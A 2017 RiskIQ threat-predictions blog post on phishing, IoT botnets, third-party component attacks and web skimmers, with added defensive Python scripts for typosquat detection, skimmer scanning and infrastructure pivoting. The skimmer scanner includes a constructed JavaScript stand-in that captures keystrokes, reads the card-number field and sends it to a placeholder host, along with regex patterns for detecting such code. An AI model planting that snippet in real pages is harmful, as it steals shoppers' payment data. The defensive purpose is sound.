2016 was a busy year for cyber security, with attacks ranging from Yahoo! to the US Democratic National Committee, the rise of ransomware, and The Shadow Brokers’ theft and auctioning of hacking tools. Closer to home we saw the largest fine yet imposed by the Information Commissioner’s Office (£400,000 against TalkTalk for its 2015 breach) and growing concern about what fines might look like once GDPR applies from May 2018.
I expect to see some differences in the 2017 threat landscape. The increased use of and reliance on web, mobile apps and social media to engage with customers and prospects along with the continued proliferation of IoT devices offer ever more opportunities for threat actors. Here are some of the trends RiskIQ thinks security professionals should watch out for.
As zero-days and host exploits get harder to pull off, threat actors are reverting to forms of attack that are unsophisticated but proven. Phishing is rising in popularity again, and traditional email and web phishing, spear phishing, whaling and Business Email Compromise (BEC) share many of the same simple root causes: domain infringement (lookalike and typosquatted domains) together with impersonation of a brand’s content, branding and keywords.
Phishers are also conquering new ground. We have seen threat actors leverage fake mobile apps for some time; more recently we have seen them move onto social media, and in 2017 this trend will grow sharply, especially as social networks add online marketplaces (Facebook) and payment gateways that give an impersonation account a direct route to a victim’s money.
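As an added illustration (example code, not RiskIQ’s), the Python script below shows how the domain-level root causes just described can be checked mechanically against a feed of candidate domains, such as new registrations or names seen in certificate-transparency logs. It catches confusable-character substitutions, one-character typos, the brand used as a keyword inside the registrable label, and the brand hidden in a subdomain of an unrelated domain. The brand names, candidate domains, confusables table and public-suffix list are all constructed for the example.

```python
"""Flag domains that impersonate a brand through confusable characters,
small edits, or brand keywords in the label or a subdomain.
Added example (not RiskIQ code); brands and candidate domains are constructed."""

BRANDS = ["examplebank", "acmepay"]  # constructed brand labels

# Confusable substitutions typical of typosquats. Assumption: a small
# illustrative map, not the full Unicode confusables table.
MULTI_CONFUSABLES = {"rn": "m", "vv": "w"}
CONFUSABLES = {"0": "o", "1": "l", "3": "e", "5": "s", "7": "t", "@": "a",
               "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0456": "i"}

# Public suffixes with two labels. Assumption: a tiny stand-in for the
# real public suffix list.
TWO_LEVEL_SUFFIXES = {("co", "uk"), ("com", "au"), ("co", "jp")}


def normalize(label):
    """Lower-case and collapse confusable sequences to the letters they mimic."""
    label = label.lower()
    for seq, rep in MULTI_CONFUSABLES.items():
        label = label.replace(seq, rep)
    return "".join(CONFUSABLES.get(ch, ch) for ch in label)


def registrable_label(host):
    """Return the label immediately left of the public suffix."""
    parts = host.lower().rstrip(".").split(".")
    if len(parts) >= 3 and (parts[-2], parts[-1]) in TWO_LEVEL_SUFFIXES:
        return parts[-3]
    return parts[-2] if len(parts) >= 2 else parts[0]


def edit_distance(a, b):
    """Levenshtein distance, used to catch one-character typos."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(domain, brands=BRANDS):
    """Return (brand, reason) for the first brand the domain impersonates,
    or None for the brand's own domain or an unrelated one."""
    host = domain.lower().rstrip(".")
    label = registrable_label(host)
    norm = normalize(label)
    others = [normalize(p) for p in host.split(".") if p != label]
    for brand in brands:
        if label == brand:
            return None  # the brand's own registrable domain, under any suffix
        if norm == brand:
            return (brand, "confusable")   # e.g. examp1ebank
        if edit_distance(norm, brand) == 1:
            return (brand, "typo")         # e.g. examplbank
        if brand in norm:
            return (brand, "keyword")      # e.g. examplebank-login
        if any(brand in o for o in others):
            return (brand, "subdomain")    # e.g. examplebank.evil-host.org
    return None


def scan(domains, brands=BRANDS):
    """Run classify over a feed of domains and keep only the hits."""
    hits = []
    for d in domains:
        verdict = classify(d, brands)
        if verdict:
            hits.append((d,) + verdict)
    return hits


# Constructed feed, such as newly registered domains or CT log names.
CANDIDATES = [
    "examplebank.com", "examp1ebank.com", "examplebank-login.net",
    "examplbank.com", "examplebank.evil-host.org", "acmepay.co.uk",
    "secure-acrnepay.com", "weather.example.org",
]

if __name__ == "__main__":
    for hit in scan(CANDIDATES):
        print("%-28s impersonates %-12s via %s" % hit)
```

The confusables map and suffix list are deliberately tiny; in practice swap in the Unicode confusables data and the public suffix list, and expect the `typo` and `keyword` rules to need an allowlist of the brand’s own domains and partners before the output is fed to a takedown or blocking process.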
Internet of Things (IoT)
To date we have seen threat actors exploit IoT for DDoS, most visibly the attack on the DNS provider Dyn in October 2016, launched from the Mirai botnet of compromised cameras and home routers. Because so many large sites depended on Dyn for DNS, the attack cut off access to them for much of the eastern U.S. and other parts of the world for several hours. Many will predict that in 2017 IoT will be leveraged in more sophisticated attacks such as ransomware and data leaks, but for the most part we’ll continue to see the same kinds of attack we saw in 2016.
Why? It’s true that IoT will continue to standardise its operating systems around Android and Linux variants, eventually making it easier to write broad-scale exploit code. But for now IoT operating systems and embedded firmware are still too fragmented for that to pay off.
As endpoints get harder to compromise, adversaries such as nation-states, hacktivists and cyber criminals will ramp up the number of external threats aimed at organisations. Most of the incidents that lead to data breaches will therefore come from external sources, especially in digital channels like social, mobile, email and the cloud, where many digital assets are unknown to, and thus unmanaged by, the organisations responsible for them.
Third Party Components
Threat actors are discovering that if you can’t beat ’em, target a third-party component of their infrastructure instead. Now that Microsoft Windows and Office are no longer the easiest common denominator to exploit, threat actors will move towards other shared components and infrastructure that give them a “many-to-one” advantage, i.e. pieces that plug into many different organisations at the same time.
For example, content management systems (CMSs) such as WordPress are a big target: a single vulnerability in the core or in a popular plugin gives a threat actor a way into thousands of websites at once. Similarly, if a marketing platform such as Eloqua or Marketo were compromised, a threat actor would gain access to data from thousands of customer campaigns as well as a foothold on the thousands of corporate websites that embed these services’ scripts. Widgets, beacons and commonly used third-party JavaScript libraries will continue to be targets for the same reason: compromising one copy served from a shared CDN or vendor can compromise every website that loads it.
More Stealthy Tactics
Modern vulnerability scanners look for weaknesses that could be exploited; they do not detect malicious code that is already embedded in a page and running against its visitors. Threat actors will exploit that blind spot and get even sneakier. To avoid detection they will launch attacks that rewrite the document object model (DOM) of a page and inject keyloggers that record every keystroke typed into a form field and send it to a server the attacker controls. That means when you punch your credit card details into a compromised eCommerce site they fall straight into the attacker’s hands, while the page keeps working normally and the checkout still completes.
RiskIQ’s Threat Research Team has seen a new shopping cart exploitation that uses exactly this method.
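Because this kind of attack lives in the page rather than in a server vulnerability, the useful check is to fetch the page as a visitor would and inspect what it actually loads, which is how external web crawling finds this class of attack. The Python script below is an added example, not RiskIQ’s tooling: it parses a checkout page, flags scripts served from hosts outside an allowlist, and flags inline code that combines a keystroke or card-field hook with a way of sending data to a host the page should not talk to. The two pages, the hostnames and the allowlist are constructed for the example; the injected block is a stand-in for the behaviour described above, not a sample taken from any real incident.

```python
"""Inspect a fetched page for injected skimmer behaviour: scripts from
unexpected hosts, and inline code that hooks keystrokes or payment fields
and sends data to a host outside the allowlist. Added example, not RiskIQ
code; the pages, hostnames and allowlist below are constructed."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts the checkout page is expected to load scripts from (constructed).
ALLOWED_HOSTS = {"shop.example", "cdn.shop.example", "js.payments.example"}

KEYLOG = re.compile(r"addEventListener\(\s*['\"](keydown|keyup|keypress|input)['\"]", re.I)
SENSITIVE = re.compile(r"card|cvv|cvc|expir", re.I)
URL = re.compile(r"https?://[^\s'\"<>]+", re.I)
EXFIL_API = re.compile(r"fetch\(|XMLHttpRequest|sendBeacon|new Image\(|\.src\s*=", re.I)


class ScriptCollector(HTMLParser):
    """Collect external script URLs and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.external, self.inline = [], []
        self._in_script, self._buf = False, []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script, self._buf = True, []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._in_script = False


def host_of(url):
    """Hostname of an absolute URL; '' for relative (first-party) URLs."""
    return (urlparse(url).hostname or "").lower()


def analyze(page_html, allowed=ALLOWED_HOSTS):
    """Return a list of (finding, host) pairs; empty means nothing suspicious."""
    parser = ScriptCollector()
    parser.feed(page_html)
    findings = []
    for src in parser.external:
        host = host_of(src)
        if host and host not in allowed:
            findings.append(("external-script", host))
    for body in parser.inline:
        foreign = sorted({h for h in map(host_of, URL.findall(body)) if h and h not in allowed})
        captures = bool(KEYLOG.search(body) or SENSITIVE.search(body))
        if captures and foreign and EXFIL_API.search(body):
            # All three together: reads sensitive input, has a way to send it,
            # and names a destination outside the allowlist.
            findings.append(("skimmer", ",".join(foreign)))
        elif foreign:
            findings.append(("inline-foreign-url", ",".join(foreign)))
    return findings


# Constructed checkout page as a crawler would fetch it.
CLEAN_PAGE = """<html><body>
<form id="checkout"><input id="card-number"><input id="cvv"></form>
<script src="https://cdn.shop.example/app.js"></script>
<script>window.dataLayer = window.dataLayer || [];</script>
</body></html>"""

# Constructed skimmer stand-in: a keystroke hook that beacons the card field
# to a lookalike "stats" host, plus a loader from that same host.
INJECTED = """<script>
document.addEventListener('keydown', function () {
  var f = document.getElementById('card-number');
  if (f) { (new Image()).src = 'https://stats-cdn.example.net/p.gif?d=' + btoa(f.value); }
});
</script>
<script src="https://stats-cdn.example.net/jquery.min.js"></script>
"""
COMPROMISED_PAGE = CLEAN_PAGE.replace("</body>", INJECTED + "</body>")

if __name__ == "__main__":
    print("clean:", analyze(CLEAN_PAGE))
    print("compromised:", analyze(COMPROMISED_PAGE))
```

The three-way test (sensitive input, an exfiltration primitive, a foreign destination) keeps legitimate analytics and payment scripts from tripping the rule on their own. A production monitor would also keep the previous crawl as a baseline so that any newly appearing script is reviewed, and would render the page in a headless browser, since skimmers are often obfuscated or pulled in at runtime rather than sitting readable in the static HTML.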
Attacks Will Happen Over Shorter Periods
We are increasingly seeing phishing and malware campaigns where set-up, execution and shutdown all happen within a day. The speed at which these attacks appear and vanish means human analysts cannot keep pace with them. Companies therefore need automation that can quickly and accurately detect such attacks and push the resulting indicators into global blocking solutions within minutes, not days.
Web Scale Intelligence Will Help Level the Playing Field
Threat actors are getting more sophisticated at hiding their tracks: they anonymise their infrastructure and are getting better at detecting and evading the security scanners and crawlers that identify attacks delivered via websites and ads. To find them, hunt teams will need increasingly sophisticated intelligence in the form of combined internet datasets, linking related hosts, third-party web components and WHOIS records so that they can fingerprint and track these new tactics. Combining intelligence about what is happening outside the firewall with indicators from within the corporate network will give security teams the situational awareness they need to respond effectively to the evolving threats targeting their organisation.
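As an added example of the dataset linking described above (example code, not RiskIQ’s own tooling), the Python script below starts from one known phishing domain and walks outward over shared registrant, nameserver, IP address and embedded third-party component values to find the rest of the actor’s infrastructure, while discarding pivot values that would connect unrelated sites. All records, domains, addresses and the noise list are constructed.

```python
"""Expand from one known-bad domain to related infrastructure by pivoting
on shared WHOIS, hosting and third-party web components. Added example,
not RiskIQ code; the records and noise list below are constructed."""
from collections import defaultdict, deque

# Constructed enrichment records: one row per crawled host, as a crawler
# plus WHOIS and passive-DNS lookups might produce.
RECORDS = [
    {"domain": "examp1ebank.com", "ip": "203.0.113.10",
     "registrant": "ops@mail.example", "ns": "ns1.host.example",
     "components": {"jquery-1.12", "tracker:UA-0001"}},
    {"domain": "examplebank-login.net", "ip": "203.0.113.11",
     "registrant": "ops@mail.example", "ns": "ns1.host.example",
     "components": {"tracker:UA-0001"}},
    {"domain": "acrnepay-secure.com", "ip": "203.0.113.11",
     "registrant": "REDACTED FOR PRIVACY", "ns": "ns1.host.example",
     "components": {"tracker:UA-0001"}},
    {"domain": "news.example.org", "ip": "198.51.100.7",
     "registrant": "REDACTED FOR PRIVACY", "ns": "ns1.bigdns.example",
     "components": {"jquery-1.12"}},
    {"domain": "shop.example", "ip": "198.51.100.8",
     "registrant": "hostmaster@shop.example", "ns": "ns1.bigdns.example",
     "components": {"jquery-1.12", "tracker:UA-0002"}},
]

# Values that would link unrelated domains: a WHOIS privacy placeholder,
# a large shared DNS provider, a ubiquitous library (constructed).
NOISE_VALUES = {"REDACTED FOR PRIVACY", "ns1.bigdns.example", "jquery-1.12"}


def pivot_keys(record):
    """Every (attribute, value) pair a domain can be linked on."""
    keys = [("ip", record["ip"]), ("registrant", record["registrant"]),
            ("ns", record["ns"])]
    keys += [("component", c) for c in sorted(record["components"])]
    return keys


def build_index(records):
    """Map each pivot key to the set of domains that share it."""
    index = defaultdict(set)
    for r in records:
        for key in pivot_keys(r):
            index[key].add(r["domain"])
    return index


def expand(seed, records, noise=NOISE_VALUES, max_fanout=25):
    """Breadth-first walk from seed over shared pivots. Returns the set of
    linked domains and, for each one, the (via, attribute, value) that first
    pulled it in. Keys in noise or shared by more than max_fanout domains
    are skipped so that hosting giants do not glue everything together."""
    by_domain = {r["domain"]: r for r in records}
    index = build_index(records)
    cluster, links, queue = {seed}, {}, deque([seed])
    while queue:
        current = queue.popleft()
        for attr, value in pivot_keys(by_domain[current]):
            members = index[(attr, value)]
            if value in noise or len(members) > max_fanout:
                continue
            for other in sorted(members):
                if other not in cluster:
                    cluster.add(other)
                    links[other] = (current, attr, value)
                    queue.append(other)
    return cluster, links


if __name__ == "__main__":
    cluster, links = expand("examp1ebank.com", RECORDS)
    for d in sorted(cluster):
        print(d, "<-", links.get(d, "seed"))
```

The noise list and the fan-out limit are the part a hunt team tunes: a WHOIS privacy placeholder, a big DNS or CDN provider, or a library everyone embeds will otherwise join most of the internet into one cluster. Running `expand` with `noise=set()` on the same records shows exactly that, pulling in the unrelated news and shop domains through the shared jQuery build.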
Ben Harknett, VP EMEA, RiskIQ